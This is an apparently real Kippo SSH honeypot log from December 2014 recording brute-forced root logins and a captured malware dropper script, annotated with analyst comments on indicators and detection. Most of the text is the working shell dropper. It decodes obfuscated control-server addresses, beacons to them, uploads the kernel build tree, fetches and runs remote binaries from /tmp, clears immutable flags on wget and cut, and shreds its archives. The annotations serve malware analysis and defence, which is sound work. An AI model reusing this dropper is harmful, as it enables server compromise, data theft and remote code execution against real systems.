under_r00t

Ancora_Log_Kippo

Dec 11th, 2014
  1. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] root trying auth password
  2. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] login attempt [root/123456] succeeded
  3. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] root authenticated with password
  4. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] starting service ssh-connection
  5. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root trying auth none
  6. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root trying auth none
  7. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] got channel session request
  8. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] channel open
  9. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root trying auth password
  10. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] login attempt [root/123456] succeeded
  11. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root authenticated with password
  12. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] starting service ssh-connection
  13. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root trying auth password
  14. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] login attempt [root/123456] succeeded
  15. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root authenticated with password
  16. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] starting service ssh-connection
  17. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] executing command "__host_32__="sEEA+==deadefadcajc+jjjj"
  18. __host_64__="sEEA+==deadefadcaih+jjjj"
      # Analyst note: this script was captured by the Kippo honeypot as the payload
      # of an SSH exec request (the log line above, which also carries the first
      # statement, __host_32__=...). The traceback further down shows Kippo 0.8's
      # execCommand raising NotImplementedError, so as far as this log shows the
      # script was recorded, not run, by the honeypot.
      # The six __host_*__ values, __download_url__, __remote__ and __username__
      # are stored obfuscated; main() passes each through dec(), a fixed
      # single-character tr substitution with no key. Decoded values are not on
      # this page.
  19.  
  20. __host_32_2__="sEEA+==cbeadgakaddh+jjjj"
  21. __host_64_2__="sEEA+==cbeadgakaddg+jjjj"
  22.  
      # The *_libc_ fallbacks are byte-identical to the *_2_ fallbacks above.
  23. __host_32_libc__="sEEA+==cbeadgakaddh+jjjj"
  24. __host_64_libc__="sEEA+==cbeadgakaddg+jjjj"
  25.  
      # Encoded URL of the generic payload fetched by download_and_execute() when
      # the per-kernel build path fails.
  26. __download_url__="sEEA+==deadefahbacfb=tyDElww=jbbj"
  27.  
      # Pipe-separated encoded list; after decoding it is sent verbatim as the
      # "ip=" field by compiler() and upload().
  28. __remote__="cbeadgakadfg+jbbj|cbeadfbacfcagb+jbbj|hhacbdadgeaeb+jbbj|yoyDaoDludlcazCr+jbbj|yoyDaoDludlazCr+jbbj|yoyDasnItlzlzanzx+jbbj|yoyDaoDludlanzx+jbbj"
  29.  
  30.  
      # Credentials presented to the server. The username is decoded in main();
      # the password is used exactly as stored here.
  31. __username__='loxty'
  32. __password__='admin'
  33.  
      # Working directory for every dropped artifact: dev.tgz, build.tgz, mini,
      # bin and the <iid>/ directory.
  34. __temp__=/tmp
      # Not referenced anywhere in the visible script.
  35. __install_dir__=/usr/local/bin
      # Kernel release with everything from the first '-' onward dropped; sent as
      # the "kernel=" query parameter / form field in every server request.
  36. __kernel__=`uname -r|awk -F- '{print $1}'`
  37.  
  38. # select compiler server
  39. server(){
      # Chooses the control host for this run and leaves it in the global __host__.
      # Reads __iid and __kernel__ (both set by main() before this is called) and
      # the decoded __host_*__ values. Flow: the architecture-specific primary host
      # is probed with a check.action beacon (3 s connect timeout, one try); no
      # reply selects the *_2 fallback; a libc with major <= 2 and minor <= 5 then
      # overrides that with the *_libc host (which holds the same value as *_2).
      # The two architecture markers are decoded at runtime; their plaintext is
      # not on this page (presumably the strings the variable names suggest).
  40. __osv_X86_64=`dec 'Ijh_hf'`
  41. __osv_AMD64=`dec 'LXOhf'`
  42. __os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
  43. __os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
      # libc version is scraped from the symlink target in the ls -la listing, so
      # it expects a "libc-<major>.<minor>..." name. If the listing contains no
      # "libc-" both variables stay empty and the "[ ... -le N ]" tests below
      # presumably end in a test error (non-zero) rather than a match.
  44. if [ -f /lib/libc.so.6 ]; then
  45. __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
  46. __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
  47. fi
  48.  
      # 64-bit branch: either marker matched uname -a.
  49. if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
      # Network IoC pattern: GET <host>/check.action?iid=<IID>&kernel=<release>.
  50. __online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
  51. if [ ! -z "$__online" ]; then #
  52. __host__=$__host_64__
  53. else
  54. __host__=$__host_64_2__
  55. fi
  56.  
  57. if [ -f /lib/libc.so.6 ]; then
  58. if [ $__libc_main -le 2 ]; then
  59. if [ $__libc_sub -le 5 ]; then
  60. __host__=$__host_64_libc__
  61. fi
  62. fi
  63. fi
      # 32-bit branch: same procedure against the *_32 hosts.
  64. else
  65. __online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
  66. if [ ! -z "$__online" ]; then #
  67. __host__=$__host_32__
  68. else
  69. __host__=$__host_32_2__
  70. fi
  71.  
  72. if [ -f /lib/libc.so.6 ]; then
  73. if [ $__libc_main -le 2 ]; then
  74. if [ $__libc_sub -le 5 ]; then
  75. __host__=$__host_32_libc__
  76. fi
  77. fi
  78. fi
  79. fi
  80. }
  81.  
  82. # check md5
  83. md5(){
      # Prints the lowercase hex MD5 of its joined arguments (here: the version()
      # string) on stdout. Always returns 0; main() uppercases the digest as __iid.
  84. __data=`echo "$@"`
  85. echo -n "$__data"|md5sum|cut -d ' ' -f1
  86. return 0
  87. }
  88.  
  89. # get os version
  90. version(){
      # Builds the kernel fingerprint that md5() turns into __iid. Only when
      # /sbin/modinfo exists: takes the module named on the last line of lsmod,
      # reads its "vermagic:" line via modinfo, strips leading spaces and
      # backslash-escapes the remaining ones. Prints nothing otherwise, so the
      # fingerprint depends on which module lsmod happens to list last, and an
      # empty string still hashes to the fixed MD5 of "". Always returns 0.
  91. if [ -f /sbin/modinfo ]; then
  92. SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
  93. echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
  94. fi
  95. return 0
  96. }
  97.  
  98. checkBuild(){
      # Returns 1 (this script's "success" value throughout) when the kernel
      # build tree /lib/modules/$(uname -r)/build/ exists, 0 otherwise.
      # Side effect: leaves the path in the global __build, which generate() reads.
  99. __build=/lib/modules/`uname -r`/build/
  100. if [ -d $__build ]; then
  101. return 1
  102. fi
  103. return 0
  104. }
  105.  
  106. # generate header file
  107. generate(){
      # Packs the whole kernel build tree (__build, set by checkBuild()) into
      # __temp__/dev.tgz: -h follows symlinks, -P keeps absolute member paths.
      # Returns 1 when tar exited 0, else 0. The archive is what upload() sends
      # to the server, so its creation is an exfiltration precursor worth alerting on.
  108. __files=`ls $__build`
  109. tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
  110. if [ $? -eq 0 ] ;then
  111. return 1
  112. fi
  113. return 0
  114. }
  115.  
  116. # check header version
  117. check(){
      # Asks the selected server about this fingerprint:
      # GET __host__/check.action?iid=<iid>&kernel=<kernel>, 3 s connect timeout,
      # 3 tries. The reply is split on "|" into <code>|<md5>; only code 1001
      # yields return 1 (presumably "server already has headers for this
      # fingerprint", since main() then asks for a remote compile instead of
      # uploading). Any other reply, no reply, or an empty iid returns 0.
      # __md5 is stored but never read.
  118. __iid=`echo "$@"`
  119. if [ ! -z "$__iid" ]; then
  120. __result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
  121. if [ ! -z "$__result" ]; then
  122. __code=`echo $__result|awk -F "|" '{print $1}'`
  123. __md5=`echo $__result|awk -F "|" '{print $2}'`
  124. if [ $__code -eq 1001 ]; then
  125. return 1
  126. fi
  127. fi
  128. fi
  129. return 0
  130. }
  131.  
  132. # download build file
  133. download(){
      # Fetches __host__/upload/module/<iid>/build.tgz into /tmp/build.tgz
      # (the path is hard-coded here rather than built from __temp__).
      # Returns 1 when wget exited 0, 0 otherwise or when iid is empty.
  134. __iid=`echo "$@"`
  135. if [ ! -z "$__iid" ]; then
  136. __url="$__host__/upload/module/$__iid/build.tgz"
  137. wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
  138. if [ $? -eq 0 ];then #
  139. return 1
  140. fi
  141. fi
  142. return 0
  143. }
  144.  
  145. download_and_execute(){
      # Last-resort path taken by main() when no per-kernel build was obtained:
      # fetches the decoded __download_url__ to /tmp/bin, marks it executable,
      # runs it in the foreground, waits 3 s, then deletes it. Returns 1 if the
      # download succeeded, 0 otherwise; the payload's own exit status is ignored.
      # Analyst note: /tmp/bin exists only briefly, so process-execution telemetry
      # is a better detection source than a file scan.
  146. wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
  147. if [ $? -eq 0 ];then #
  148. chmod +x /tmp/bin
  149. /tmp/bin
  150. sleep 3
  151. rm -rf /tmp/bin
  152. return 1
  153. fi
  154. return 0
  155. }
  156.  
  157. # remote compiler code
  158. compiler(){
      # Requests a server-side build for this fingerprint:
      # GET __host__/compiler.action with iid, the username/password, the decoded
      # __remote__ list (as "ip="), the version() string and __kernel__ in the
      # query string, 3 s connect timeout, 3 tries. Reply handling mirrors
      # check(): "<code>|<md5>", code 1001 returns 1, anything else (or an empty
      # iid) returns 0. __md5 is stored but never read.
  159. __iid=`echo "$@"`
  160. if [ ! -z "$__iid" ]; then
  161. __url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
  162. __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
  163. if [ ! -z "$__result" ]; then
  164. __code=`echo $__result|awk -F "|" '{print $1}'`
  165. __md5=`echo $__result|awk -F "|" '{print $2}'`
  166. if [ $__code -eq 1001 ]; then
  167. return 1
  168. fi
  169. fi
  170. fi
  171. return 0
  172. }
  173.  
  174. # uncompress file
  175. uncompress(){
      # Extracts __temp__/build.tgz into __temp__/<iid>/ (created if missing).
      # On success the archive is destroyed with "shred -u -z" (overwrite, zero,
      # unlink) rather than rm -- an anti-forensics step that leaves the
      # extracted tree but not the downloaded package -- and 1 is returned.
      # Extraction failure or an empty iid returns 0 and keeps the archive.
  176. __iid=`echo "$@"`
  177. if [ ! -z "$__iid" ]; then
  178. if [ ! -d $__temp__/$__iid ]; then
  179. mkdir $__temp__/$__iid
  180. fi
  181. tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
  182. if [ $? -eq 0 ] ;then
  183. shred -u -z $__temp__/build.tgz
  184. return 1
  185. fi
  186. fi
  187. return 0
  188. }
  # enc(): obfuscation helper. Maps every character of its arguments from the
  # first tr set to the character at the same position in the second; a fixed
  # substitution with no key. Not called anywhere in the visible script.
  189. enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
  # dec(): the two tr sets of enc() swapped, used by main() and server() to
  # recover hosts, URLs, the remote list, the username and the arch markers.
  # Whether it is an exact inverse depends on the two sets expanding to the same
  # length, which is not verified here; a defender can reproduce the decoding
  # offline with the same tr invocation.
  190. dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }
  191.  
  192. # install file
  193. setup(){
      # Runs the extracted payload __temp__/<iid>/bin in the foreground. If it
      # exits 0: wait 3 s, delete the binary, return 1. Any other exit status (or
      # an empty iid) returns 0. Deleting the file after a successful return
      # suggests the binary backgrounds itself, but that is not visible here.
  194. __iid=`echo "$@"`
  195. if [ ! -z "$__iid" ]; then
      # Indirection only; the file name is the literal "bin".
  196. __bin=`echo "bin"`
  197. chmod +x $__temp__/$__iid/$__bin
  198. $__temp__/$__iid/$__bin
  199. if [ $? -eq 0 ]; then
  200. sleep 3
  201. rm -rf $__temp__/$__iid/$__bin
  202. return 1
  203. fi
  204. fi
  205. return 0
  206.  
  207. }
  208.  
  209.  
  210. # upload
  211. upload(){
      # Exfiltrates the kernel build archive. Downloads a helper,
      # __host__/upload/mini, to /tmp/mini and uses it to POST __temp__/dev.tgz
      # (file=@...) together with the credentials, __remote__, version and kernel
      # to __host__/submit.action. Reply handling as in check(): code 1001 returns
      # 1, else 0. /tmp/mini is removed on every path, so it is another
      # short-lived artifact. The helper's --url/--post interface is inferred only
      # from this call; what it is is not on this page.
  212. rm -f /tmp/mini
  213. wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
  214. if [ $? -eq 0 ];then #
  215. chmod +x /tmp/mini
  216. __url=$__host__/submit.action
  217. __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
  218. if [ ! -z "$__result" ]; then
  219. __code=`echo $__result|awk -F "|" '{print $1}'`
  220. __md5=`echo $__result|awk -F "|" '{print $2}'`
  221. if [ $__code -eq 1001 ]; then
  222. rm -f /tmp/mini
  223. return 1
  224. fi
  225. fi
  226. rm -f /tmp/mini
  227. fi
  228. return 0
  229. }
  230.  
  231.  
  232.  
  233. # main entry
  234. main(){
      # Entry point. Sequence: decode the configuration, fingerprint the kernel,
      # re-enable wget/cut, pick a server, obtain a kernel-specific build (either
      # the server already has headers, or the local headers are uploaded so it
      # can build), install it, fall back to the generic payload, clean up.
  235. PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
      # Decode the obfuscated configuration in place (see dec()). __password__ is
      # the one credential that is not decoded.
  236. __host_32__=`dec "$__host_32__"`
  237. __host_64__=`dec "$__host_64__"`
  238. __host_32_2__=`dec "$__host_32_2__"`
  239. __host_64_2__=`dec "$__host_64_2__"`
  240. __host_32_libc__=`dec "$__host_32_libc__"`
  241. __host_64_libc__=`dec "$__host_64_libc__"`
  242. __download_url__=`dec "$__download_url__"`
  243. __remote__=`dec "$__remote__"`
  244. __username__=`dec "$__username__"`
  245. __version__=`version`
      # __iid: uppercase MD5 of the vermagic-derived version string. It names the
      # server-side build and the local working directory __temp__/<iid>.
  246. __iid=`md5 "$__version__"`
  247. __iid=`echo $__iid|tr [:lower:] [:upper:]`
  248. __done=0
  249.  
  250. if [ ! -d /tmp ]; then
  251. mkdir /tmp
  252. fi
  253.  
      # Hardening bypass: clears the immutable attribute on wget and cut (a
      # common way admins disable them) and restores execute permission, in both
      # /usr/bin and /bin. Failures are ignored. Defender note: chattr -i against
      # these binaries is a strong audit signal.
  254. if [ -f /usr/bin/wget ]; then
  255. chattr -i /usr/bin/wget
  256. chmod +x /usr/bin/wget
  257. fi
  258.  
  259. if [ -f /bin/wget ]; then
  260. chattr -i /bin/wget
  261. chmod +x /bin/wget
  262. fi
  263.  
  264. if [ -f /usr/bin/cut ]; then
  265. chattr -i /usr/bin/cut
  266. chmod +x /usr/bin/cut
  267. fi
  268.  
  269. if [ -f /bin/cut ]; then
  270. chattr -i /bin/cut
  271. chmod +x /bin/cut
  272. fi
  273.  
  274. server # select http server
      # check() == 1: the server already knows this fingerprint, so ask it to
      # build for us directly.
  275. check $__iid
  276. if [ $? -eq 1 ];then
  277. compiler $__iid # remote compiler
  278. if [ $? -eq 1 ]; then
  279. __done=1
  280. fi
      # Otherwise ship the local kernel headers (generate + upload) when the build
      # tree exists; if it is missing or cannot be archived, still request a
      # remote build. dev.tgz is removed on every path.
  281. else
  282. checkBuild
  283. if [ $? -eq 1 ];then
  284. generate # create header file
  285. if [ $? -eq 1 ]; then
  286. upload
  287. if [ $? -eq 1 ] ;then
  288. __done=1
  289. fi
  290. rm -rf $__temp__/dev.tgz
  291. else
  292. if [ -f $__temp__/dev.tgz ]; then
  293. rm -rf $__temp__/dev.tgz
  294. fi
  295. compiler $__iid # remote compiler
  296. if [ $? -eq 1 ]; then
  297. __done=1
  298. fi
  299. fi
  300. else
  301. compiler $__iid # remote compiler
  302. if [ $? -eq 1 ]; then
  303. __done=1
  304. fi
  305. fi
  306. fi
  307.  
      # Retrieve, unpack and run the built package; any failure resets __done so
      # the generic fallback runs instead.
  308. if [ $__done -eq 1 ]; then
  309. download $__iid
  310. if [ $? -eq 1 ]; then
  311. uncompress $__iid
  312. if [ $? -eq 1 ]; then
  313. setup $__iid
  314. if [ $? -ne 1 ]; then
  315. __done=0
  316. fi
  317. else
  318. __done=0
  319. fi
  320. else
  321. __done=0
  322. fi
  323. fi
  324.  
      # Nothing kernel-specific worked: fetch and run the generic payload.
  325. if [ $__done -eq 0 ]; then
  326. download_and_execute
  327. fi
      # Removes the extraction directory; the running payload is not touched.
  328. rm -rf $__temp__/$__iid
  329. }
  330.  
  331. main
      # The script's exit status is that of listing /var/run/mount.pid -- presumably
      # a marker the installed payload creates, which is not shown here -- not
      # main()'s; the listing also tells the operator whether the install took.
  332. ls -la /var/run/mount.pid
  333. exit $?
  334. "
  335. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] Unhandled Error
  336. Traceback (most recent call last):
  337. File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
  338. return context.call({ILogContext: newCtx}, func, *args, **kw)
  339. File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
  340. return self.currentContext().callWithContext(ctx, func, *args, **kw)
  341. File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
  342. return func(*args,**kw)
  343. File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/channel.py", line 137, in requestReceived
  344. return f(data)
  345. --- <exception caught here> ---
  346. File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/session.py", line 68, in request_exec
  347. self.session.execCommand(pp, f)
  348. File "/home/honey/kippo-0.8/kippo/core/honeypot.py", line 464, in execCommand
  349. raise NotImplementedError
  350. exceptions.NotImplementedError:
  351.  
  352. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] got channel session request
  353. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19078,23.228.196.60] channel open
  354. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] got channel session request
  355. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19079,107.160.48.7] channel open
  356. 2014-12-11 15:39:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19078,23.228.196.60]